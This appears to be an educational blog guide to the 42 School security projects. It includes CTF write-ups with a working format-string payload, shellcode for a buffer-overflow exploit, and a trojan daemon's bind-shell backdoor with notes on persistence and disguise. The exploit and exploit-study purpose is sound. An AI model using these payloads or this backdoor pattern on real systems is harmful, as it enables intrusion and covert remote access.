Security is not just about patching bugs, but understanding how they occur. This comprehensive guide covers the 42 School security curriculum: from logical vulnerabilities in Snow-Crash to advanced binary exploitation in Rainfall and Over-Ride, and understanding malware through ft_shield.

Part 1: Snow-Crash - Introduction to Security

Snow-Crash focuses on logical vulnerabilities, weak cryptography, and scripting skills.

Challenge Highlight: Level 09 (Bitwise Obfuscation)

The program adds the index to each character value:

$ ./level09 aaaaa
abcde

The Solution Script

import sys

with open(sys.argv[1], "rb") as f:
    token = f.read()

decoded = ""
for i, byte in enumerate(token):
    decoded += chr(byte - i)

print(decoded)

Key Learnings

SUID Bits: Understanding how "Set Owner User ID" allows privilege escalation.
Scripting for CTFs: Python is invaluable for automating reversing tasks.
Legacy Code: Dealing with old vulnerabilities foundational to security history.

Part 2: Rainfall - Memory Corruption

Rainfall focuses on memory corruption: Buffer Overflows, Format Strings, and Integer Overflows.

Format String Vulnerability (Level 3)

char buffer[512];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer); // VULNERABILITY!

The Vulnerability

%x: Leaks stack memory.
%n: Writes the count of printed characters to an address pointer.

Exploit Strategy

Find address of target variable using GDB (0x0804988c).
Put the address on the stack at a calculable offset.
Use %4$n to write to the 4th argument.

Final Payload

python -c 'print("\x8c\x98\x04\x08" + "%60c%4$n")'

Part 3: Over-Ride - Binary Exploitation

Stack Buffer Overflow (Level 01)

1. Reconnaissance

$ ./level01
********* ADMIN LOGIN PROMPT *********
Enter Username: dat_will
Enter Password: [input]
nope, incorrect password...

2. Finding the Offset

Using GDB with a cyclic pattern, we find the EIP overwrite at offset 80.

(gdb) run
Enter Password: Aa0Aa1Aa2... [200 chars]
Program received signal SIGSEGV, Segmentation fault.
0x37634136 in ?? ()

3. The Strategy

Inject Shellcode into the username buffer.
Overflow the password buffer until we reach the saved return address.
Redirect Execution by overwriting with the address of our shellcode.

4. The Exploit Payload

# Shellcode: 21 bytes to spawn /bin/sh
shellcode = b"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

# Address of username buffer (found via GDB): 0x0804a040
ret_addr = b"\x47\xa0\x04\x08"  # Little-endian

print("dat_wil" + shellcode + "\n" + "A"*80 + ret_addr)

Key Concepts

Memory Layout: Understanding Stack, Heap, Text, and BSS segments.
Endianness: x86 is Little-Endian; addresses must be written backwards.
Protection Mechanisms: NX (bypassed with ROP), ASLR (bypassed via leaks), Canaries.

Part 4: ft_shield - Understanding Malware

ft_shield appears as a system protection service but is actually a Trojan Daemon that opens a backdoor for remote access.

Daemon Mechanics

void skeleton_daemon()
{
    pid_t pid;

    pid = fork();
    if (pid < 0) exit(EXIT_FAILURE);
    if (pid > 0) exit(EXIT_SUCCESS); // Parent dies

    if (setsid() < 0) exit(EXIT_FAILURE);

    pid = fork(); // Second fork
    if (pid < 0) exit(EXIT_FAILURE);
    if (pid > 0) exit(EXIT_SUCCESS);

    // The process is now a daemon
}

The Backdoor

Once running silently, it opens a listening socket and spawns a shell upon authentication:

dup2(client_fd, STDIN_FILENO);
dup2(client_fd, STDOUT_FILENO);
dup2(client_fd, STDERR_FILENO);
execve("/bin/sh", NULL, NULL);

Persistence

Installs as a systemd service to survive reboots.
Uses file locks to ensure only one instance runs.
Disguises itself with a legitimate-sounding name.

Conclusion

By learning to exploit simple memory errors, we become better C programmers, more conscious of secure coding practices, and more aware of how attackers think. This knowledge is essential for building secure systems.

Explore the Code

Check out Snow-Crash, Rainfall, Over-Ride, and ft_shield on GitHub.